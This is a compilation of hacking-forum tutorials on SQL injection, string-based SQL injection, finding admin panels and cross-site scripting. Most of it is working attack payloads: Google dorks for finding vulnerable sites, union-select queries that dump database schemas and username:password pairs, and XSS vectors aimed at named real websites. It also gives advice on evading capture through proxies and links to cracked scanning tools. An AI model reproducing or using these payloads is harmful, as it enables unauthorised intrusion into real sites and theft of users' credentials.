SQL Injection Tutorial For Beginners

What is a SQL Injection?

A SQL Injection is a method used by people which allows them to get inside of a MySQL database through the website.

What can I do with an SQLi?

You can extract data such as passwords, usernames, locations, and also change the site in which you can put whatever you want on it.

Is it hard to do?

At first, it may take you some time to get used to the queries. But after some practice, it's very easy.

Will I get caught?

If you are not using a proxy or VPN (Virtual Private Network), then yes there is a chance that you may be caught. I suggest reading the Proxies and Socks forum on here to learn more about what these are.

What is a dork?
A dork is a phrase that you see at the end of most URLs. In SQL Injection, you search for dorks to find a website that looks as though it may be vulnerable for injecting

Injection Tutorial
Step 1.

Search Google by typing in a dork and clicking one of the website that show up.

Common Dorks

inurl:members.php?id=
inurl:page.php?id=
inurl:login.php?id=
inurl:index.php?id=
inurl:register.php?id=
inurl:staff.php?id=
inurl:detail.php?id=
inurl:view.php?id=
Vulnerable Sites #1
Vulnerable Sites #2
Vulnerable Sites #3

So what does dork do ?
It's way of searching .
The above dorks will yield a vulnerable site that will used for testing
put the any one of the dork in google search and it will yield a vulnerable site


Step 2. Once you have found a site, it's time that we check if it is vulnerable to a SQL Injection.

So let's say we have a site like this

Quote:http://www.site.com/index.php?id=1

What we do is put a ' (single quote) after the number in order to get an error to show up on the page.

Quote:http://www.site.com/index.php?id=1'

You should get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near line 1" or something.


Step 3. After getting the error, we know it's vulnerable to SQL Injection. Now we have to find out how many columns it has. We use the "order by" function to do this

Quote:http://www.site.com/index.php?id=1 order by 10

Now, I suggest you go by 10's. If you did order by a number and it shows an error, that means to use a lower number. We need to use a number and not get any errors, then use the number right after the number we used and get an error.

So let's say we did:

order by 10 (error)
order by 7 (no error)
order by 8 (no error)
order by 9 (error)

What this means is that there are 8 columns.

Step 4. Now that we have the number of columns, it's time to figure out which column is vulnerable so that we can extract data from it. We can do this by putting a "-" minus sign after the = equals sign in the url and by using the union select function. After union select, write every number that leads to the number of columns, separated by a comma.

So here's how it should look:

Quote:http://www.site.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8

After you do this, you should should get one or more of the numbers of columns in the database to show up on screen.

Step 5. Let's say a number 2 popped up on the screen. That means that column number 2 is vulnerable. Now we need to get the version of the database. We do this by using the @@version function.

Quote:http://www.site.com/index.php?id=-1 union select 1,@@version,3,4,5,6,7,8

Replace the number 2 in the url with @@version to get the version number to show up on your screen. Now the numbers that show up should either be 5.(some numbers) or 4.(some numbers).

For SQL Version 5 Injection:
Step 1. Now that we have the version number, it's time to get the name of the tables within the database. We use the group_concat(table_name) function. Since it's version 5, the tables are already in 1 big table named information_schema. We use -- to execute our command.

Quote:http://www.site.com/index.php?id=-1 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables--

Step 2. On the screen, a bunch of names should pop up. Those are the names of the tables. Now, what you need to look for anything that might look like it contains the usernames and passwords from everyone who uses the website. Some common ones are users, admin, members, staff, user, etc.

Step 3. Once you have found something that might contain the usernames and passwords, it's time to get the name of the columns within that table. We use the group_concat(column_name) function to achieve this. And once again, in version 5, the columns are within information_schema.columns this time.

After the information_schema.columns, you need to tell the database which table you want to extract the columns. So after .columns, you put where table_name=(Name of table in hex form)
Now to convert the name of the table you're extracting from into Hex form, you need to use an online converter. What I use is Text to Hex Converter. After you have the hex, put 0x before it and copy all of the numbers/letters and paste them after the = equals sign.

So after all that it should look like this:

Quote:http://www.site.com/index.php?id=-1 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name=0x7573657273

The name of the columns should pop up on your screen.

Step 4. Now that you have the column names within the table name you chose, it's time to extract the data. Once again, we will use the group_concat function.

Let's say that the column names that showed up were username,password. To extract the information, we put group_concat(username,0x3a,password) from users-- (The table name that you chose in TEXT form not Hexed). (Note: 0x3a is the hex form of a colon, which separates the usernames and passwords so you don't get confused.) After you've done this, you're url should look like this:

Quote:http://www.site.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5,6,7,8 from users--

Now the usernames of people should show up, then a colon, then the passwords of the usernames.


Thank you for reading

Read More

String Based SQL injection

What is String Based SQL injection and how to notice them?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:

Code:

"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi)

---

---

---

Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with SQLi

Code:

http://site.com/index.php?id=10' order by 1000--+

That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query

Code:

id=X' order by--+

Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we

---

---

String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)

Code:

http://www.site.com/index.php?id=234' order by 11--+

Results show error, so we'll assume as 10 columns, since it'll be an example for our process

2. Obtaining the Databases

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+

Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3.Obtaining the Tables from the current Database

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+

Results will display the current table names
For this example, we'll be using the table name: "admin"

4.Obtaining Column names from a specific table (which in this example is "admin")

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5.Obtaining Data from Column names

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection

Read More

How to find admin pages

Today im gonna show how to find admin panels when you have info to login.

There's a few options to find it.

1) Adding to URL

http://www.site.com/admin
http://www.site.com/administrator
http://www.site.com/admin.php
http://www.site.com/login

2) Online scanning (Link is at the end)

3) Perl scripts (Script and Active Perl link will be on end of this page)

For this you will need install Active Perl...

4) Programs (Links at the end of the thread)

You can use Havij or Reiluke's admin finder

5) Scan ports (Link at the end of the thread)

For that use nMap.First you need to get your websites IP address.
Go to cmd (start>run>cmd) and type ping site.com (without http://www. After that paste the IP in nMap and click 'Scan'
When finished pick tab 'Ports/computers'


6) Crawl website (Link + crack to acunetix)

Just scan all files and folders on site.Acunetix is the right tool

7) robots.txt

Check robots.txt
http://www.site.com/robots.txt

7) Google

Dork: site:webpage.com "admin"
site:webpage.com "login"

Downloads and links:

Online scanner -> http://sc0rpion.ir/af/

Download Perl -> http://www.activestate.com/activeperl/downloads
Perl script -> http://pastebin.com/WWZszURW

Havij (Uploaded by me) -> http://www.mediafire.com/download.php?s2iiaabz87i7t8a
Reiluke admin finder (Uploaded by me) -> Automatic download

nMap -> http://nmap.org/download.html

Acunetix (Uploaded by me) -> http://www.mediafire.com/download.php?vam13z7pe1b85kl

Password for locker .rar is

www.reiluke.i.ph

Read More

XSS

XSS
[Behind the mask]

What is XSS?

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 80.5% of all security vulnerabilities documented by Symantec as of 2007.[1] Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.<exlanation from Wikipedia>

Let’s XSS

XSS is not just pasting XSS attack vectors in search boxes , and address bars , you have to know where that input is going , how is it being parsed , etc... If you wanna learn how to find XSS holes on pages first you need to have atleast basic knowledge of HTML , Javascript and a little bit of PHP . So in this paper I will go over some XSS vulnerable websites from XSSed.com , and we will be reviewing source code of those vuln web sites. My main goal is to show you how to properly build your XSS attack vector.

I will not:
1. Show you how to steal cookies
2.Take responsibility for your action after you read this paper.

Our first site will be:
1 .

Code:

http://www.un.lk/media_centre/press_releases.php?id=#

Lets try and change the # to something else , for example. id=XSSTest and we see that no error is shown so we can assume that webpage has accepted our input , lets see where in the source is our XSSTest string located.

Source of [http://www.un.lk/media_centre/press_releases.php?id=XSSTest ] :

Spoiler (Click to View)

Great in both examples we are already inside JavaScript

But this doesn’t proves anything , lets see will <> be parsed so next we go:
[www.un.lk/media_centre/press_releases.php?id=<script>]

Source of [www.un.lk/media_centre/press_releases.php?id=<script>] : 

Spoiler (Click to Hide)

Great our input is not being parsed , if it were we would have &lt;script&gt;
instead of <script> .

I will show you 2 options how to exploit it :

1. jshow(<script>) in here you can see we are already inside the javascript so we can just do

Code:

www.un.lk/media_centre/press_releases.php?id=alert(0)

and our alertbox will be executed. Why , you ask? Look at the source code :

Spoiler (Click to Hide)

Our alertbox is taken as valid input and processed by our browser and there you have alertbox.[ onload= ] is Jscript event that triggers when page is loaded , so when you call it onload="Here is where javascript is located" , everything inside onload event will be processed as valid input , and so is our alert(0).

2.Every element on webpage has it’s openning [ < ] and closing [ > ] tag.
);jshow(<script>);"> as you can see closing is done with );"> so it goes like this alert(0) );"> , so for our XSS to work we must close the body tag and start a new <script> tag.So in this case we use :

Code:

www.un.lk/media_centre/press_releases.php?id=);"><script>alert(0)</script>

Source code :

Spoiler (Click to Hide)

You see we closed the body tag and started the new <script> tag , and cos it’s valid it is executed.

Also another way is :

<script language="javascript" type="text/javascript" defer="defer">

news_toggle_visibility(<script>);

</script>

to escape the tag we use );</script><script>alert(0)</script> (we closed the existing <script> with );</script> and started new one <script>alert(0)</script> )

The url is :

Code:

http://www.un.lk/media_centre/press_releases.php?id=);</script><script>alert(0)</script>

Source:

Spoiler (Click to Hide)

or we can do this :

Code:

http://www.un.lk/media_centre/press_releases.php?id=);</script><script>alert(0)</script><script>alert(12

In solution before we saw there is ); left after our injected XSS vector so here is the source:

Spoiler (Click to Hide)

We just added <script>alert(12 vector and );</script> just closed our injected script tag.

Code:

http://www.chip.de/ii/grossbild_v2.html?sales=2122

Time to review the code , after searching for value 2122 inside the source code we get :

Spoiler (Click to Hide)

As you can see like in our first example we are already inside <script> tag , but in this case we have to close the value and input new Jscript code , in our case we have"2122"; so first part of our XSS vector will be "; . So lets try "; alert(0);

Code:

http://www.chip.de/ii/grossbild_v2.html?sales="; alert(0);

Source :

Spoiler (Click to Hide)

As you can see we are inside the script but no alertbox is shown , but why is that , it’s because of "; after our XSS attack vector , and as you can see every value that is assigned to variable has opening " and closing " and in our case we have closed somtr.prop48=" value with "; but there is "; left unclosed. You can see the problem first value is closed but what is with third " , we have to close it too , so our XSS link will be :

Code:

http://www.chip.de/ii/grossbild_v2.html?sales="; alert(0); MaXoNe="XSS

So lets see the source :

Spoiler (Click to Hide)

As you can see we closed the third " and our alertbox is shown , so the rule is try to close either every tag or every value with your XSS attack vector...You will have less errors on the page you are XSSing and your XSS vector will look cooler .

Code:

http://www.bhtelecom.ba/korisnicki_portal.html?&no_cache=1 [POST][Self XSS]

Self XSS is XSS attack that is trigered when user enters payload inside the vulnerable input box , it takes SE for this type of XSS.Unlike for GET method when we can see our XSS payload inside the link bar in our browser , POST method wont show you what is webpage sending to server , so we have to use tools to see what POST values we are sending to server , we can use :

1. Live HTTP headers [http://www.youtube.com/watch?v=bz7KGhraX-0 ]
2. BurpSuite Proxy [lookup Hooded Robin’s tut on that]

Here we have two input boxes , one says "Login ili mobitel" and the other "Lozinka" , so lets input something inside those two input boxes and press OK button.
Lets input Text"<>/\ in "Login ili mobitel" field and Text2"<>/\ in "Lozinka" field. We get an error but lets see where did our input go , so here is the source :

Spoiler (Click to Hide)

[spoiler]

We see that our input did some changes to source code , first value from login input box , closed the source value :

src="https://portal.bih.net.ba/amserver/UI/Login?Login.Token1=Text\"<>/\\

And we can see that our input is not being encoded , so lets now try this:

First input box : TestXSS
Second input : "></iframe></div><script>alert(0)</script>

And when we press OK button , we get alert box , lets see why is that :

[spoiler]

What happened:

"> ----that closed src value in opened iframe tag :

<iframe src="https://portal.bih.net.ba/amserver/UI/Login?Login.Token1=sss&Login.Token2=\">

</iframe> ---- closed iframe tag :

<iframe src="https://portal.bih.net.ba/amserver/UI/Login?Login.Token1=sss&Login.Token2=\"></iframe>

<script>alert(0)</script> --- new script tag with alertbox

and thats it , we escaped the iframe tag with "></iframe> and added new script tag <script>alert(0)</script>.To hide any errors use either

1. "></iframe></div><script>alert(0)</script><!— (coments out the rest of code)
2. "></iframe></div><script>alert(0)</script><iframe> (figure it out )

And now , maybe you think that XSS attacks can’t make any damage but big companies like Google and Facebook have a reward program for XSS findings on their sites , cos XSS attacks can be used to steal users cookies [http://jehiah.cz/a/xss-stealing-cookies-101 ]] and when you consider that big companies have millions of users , vulnerability like XSS can have devastating effect.
Se lets analyze Google XSS vulnerability which was found by ElvinGuitar, user from HackForums.net :

Vuln. link :

Code:

https://www.google.com/voice/rates?p=

Lets try :

Code:

https://www.google.com/voice/rates?p=XSSTest

We get the same page so out input is accepted , and now lets review the code :

Spoiler (Click to Hide)

Here is our input lets evaluate how we can exploit it , so first we notice we are inside the script , and we have '); as our first part of XSS attack vector , so lets do this

Code:

https://www.google.com/voice/rates?p='); alert(0);</script>

So this is the result:

<script>
var callingRatesPage = new _callingRatesPage(
'en',
'USD','';); alert(0);</script>');
callingRatesPage.render(document.getElementById('calling-rates-page'));
</script>

We closed the value with '); and added our alert event alert(0); and we close the script tag with </script> and we get our alert box.

Seems easy doesn’t it , well ElvinGuitar got 1000$ for that XSS .

And now facebook :

Code:

http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=c4c288b438ed080&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1

So here is one advice , try searching the values from the url inside the source code , so in this case we would search the c4c288b438ed080 value and this is what we get , also you should search every value after the = in Url , and see where it’s located , so here is the source code :

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["c4c288b438ed080"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Nice , so lets replace c4c288b438ed080 with Test<>"\/ an we get this :

Code:

http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id= Test<>\/&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1

And the source code :

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["Test<>\/ "].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Great , our input is not being encoded , so we see we are inside the {[ ]}; brackets , so we have to close that value with MaXoNe″]}; alert(0); // and so the url will be :

Code:

http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=MaXoNe″]}; alert(0); // &path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1

And source code:

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["MaXoNe"]};alert(0); //"].saveUploadedImage(„whatever“, „whatever“, 90, 60, 80);});
...
</script>

What happened , well ″]}; closed the value and alert(0); triggered our alerbox and // is used to coment out the rest of the code all the way to the </script>.

We could use this too :

Code:

http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=MaXoNe″]}; alert(0); </script><!--&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1

The difference is that we closed the script tag and commented the rest of the code , like this :

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry[″MaXoNe″]};alert(0); </script><!—″].saveUploadedImage(″whatever″, ″whatever″, 90, 60, 80);});
...
</script>

The green code is commented out because of the <!-- .

And this one I found on ea games site :

Code:

http://www.ea.com/search?q=

So lets try :

Code:

http://www.ea.com/search?q=Test<>/\″

And lets see what we got :

Spoiler (Click to Hide)

We see that <> is filtered(deleted) but ″ is not being encoded , now we know that we can escape the value of title=″ ″ so first part of our XSS payload is ″ and what can we do next , lets see , first we can’t use < > so no script , img , body or any other tag , but we are inside the <h1> tag which is the heading value , and there are Jscript events that can be used by almost every HTML element , like :

onmouseover= activates JScript code when user moves mouse over HTML tag to who event belongs.

onclick= activates JScript code when user clicks on HTML tag to who event belongs.

ondblclick= activates JScript code when user dblclicks on HTML tag to who event belongs.

onmouseout= activates JScript code when cursor leaves the are off HTML tag to who event belongs.

So we can do this :

Code:

http://www.ea.com/search?q="onclick="alert('MaXoNe');""

Code :

Spoiler (Click to View)

With " we escaped the value , and added onclick=alert("MaX"); event and with next " we closed the value that was left behind , or we can use " onclick=alert("MaX"); //.
With // we comment out the rest of code all the way to > . So when we click the heading we get alertbox .

SQLi and XSS

URL from zerofreak’s SQLi tutorial on HF.

Code:

http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--

There are vuln. columns shown on the page , we will select column 8 , so lets see the source :

Spoiler (Click to Hide)

We will use :

Code:

http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,'</font><script>alert(/maxone/)</script><font>',9,10,11—

Look at the source and figure it out , it’s time for you to do something.

Or if magic_quotes is enable we can bypass it by hexing our value :

Code:

http://www.armorysquareofsyracuse.com/main/shopping.php?id=179  and false union /*!select*/ 1,2,0x3c2f7469746c653e3c7363726970743e616c6572742830293c2f7363726970743e,4,5,6,7​,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

Where 3c2f7469746c653e3c7363726970743e616c6572742830293c2f7363726970743e is </title><script>alert(0)</script>.
Again review the source to find out why did I used this payload.

Thats all from me , my advice go on XSSed.com , and look at mirrors , search the code ,try different XSS payloads, be creative.
Also if you want to be good XSSer master HTML and Jscript , there is no other way.
Knowledge is power.

Read More

SQL injection Tutorial

SQL injection Tutorial

FOR EDUCATIONAL PURPOSES



Finding vulnerable sites
Finding amount of columns
Getting mysql version current user
Getting Databases
Getting Tables
Getting Columns
Getting Usernames and Passwords






1. Finding vulnerable sites

To find Vulnerable sites you are going to use Google Dorks.

Some common dorks are:

====================================================================

Code:


inurl:index.php?id=
inurl:news.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=

=================================================================


lets say you got this site:

=============================================
Code:


http://site.com/news/view.php?id=828
============================================
if we add a ' before or after the numbers it should look something like this if its vulnerable:



2. Finding amount of columns


To find the right amount of columns we are using "order by". here is how it works:

===============================================================


Code:

http://site.com/news/view.php?id=828 order by 1-- (page loads normal)
http://site.com/news/view.php?id=828 order by 2-- (page loads normal)
http://site.com/news/view.php?id=828 order by 3-- (page loads normal)
http://site.com/news/view.php?id=828 order by 4-- (page loads normal)
http://site.com/news/view.php?id=828 order by 5-- (page loads normal)
http://site.com/news/view.php?id=828 order by 6-- (page loads normal)
http://site.com/news/view.php?id=828 order by 7-- (page loads normal)
http://site.com/news/view.php?id=828 order by 8-- (page loads normal)
http://site.com/news/view.php?id=828 order by 9-- (error)
===============================================================

This means or site has 8 columns and we will now move over to "union select".


This is how it works:
===============================================================
Code:


http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,7,8--
===============================================================


Note the hyphen - before the numbers!
===============================================================


This should make the website to show some numbers on the screen like this:




===============================================================

This meens its absolutly sure that the site is vulnerable to sql injection.


3. Getting MySQL version and Current User


Now we wanna know the MySQL version. If its over 5 then its injectable by this Tut. (if its under 4 then you have to guess tables and columns).



Code:


http://site.com/news/view.php?id=-828 union select 1,2,@@version,4,5,6,7,8--








To get the Current user you type this:


===============================================================

Code:


http://site.com/news/view.php?id=-828 union select 1,2,user(),4,5,6,7,8--
===============================================================


This should display:










4. Getting Databases




Now we wanna find the databases and the Current database.

Here the syntax for all databases:

===============================================================


Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(schema_name),4,5,6,7,8 from+information_schema.schemata--

===============================================================

It should displays something like this:







Now wel would like to now what is the current database, it's pretty obvious in this case but usefull sometimes.


Syntax for current database:

===============================================================

Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,database(),4,5,6,7,8

===============================================================

This should display something like this:










5. Getting Tables



Now we want to know the tables on in the database and for this we will conintue using "union select".


===============================================================

Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()--

===============================================================


This should display something like this:








We now know that the table that passwords should be stored in are called bpusers, write it down and move on.


6. Getting Columns


Now we want to know the columns.



============================================================

Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_schema=database()--

============================================================

This should display something like this:






7. Dumping users/pass




Now you would like to dump logins and passwords from bpusers.


Here is the code for thath:

==================================================================
Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8 from bpusers--

======================================================




(NOTE: 0x3a will make a : between logins and passwords.)



You have now performed a SQL injection attack.

Read More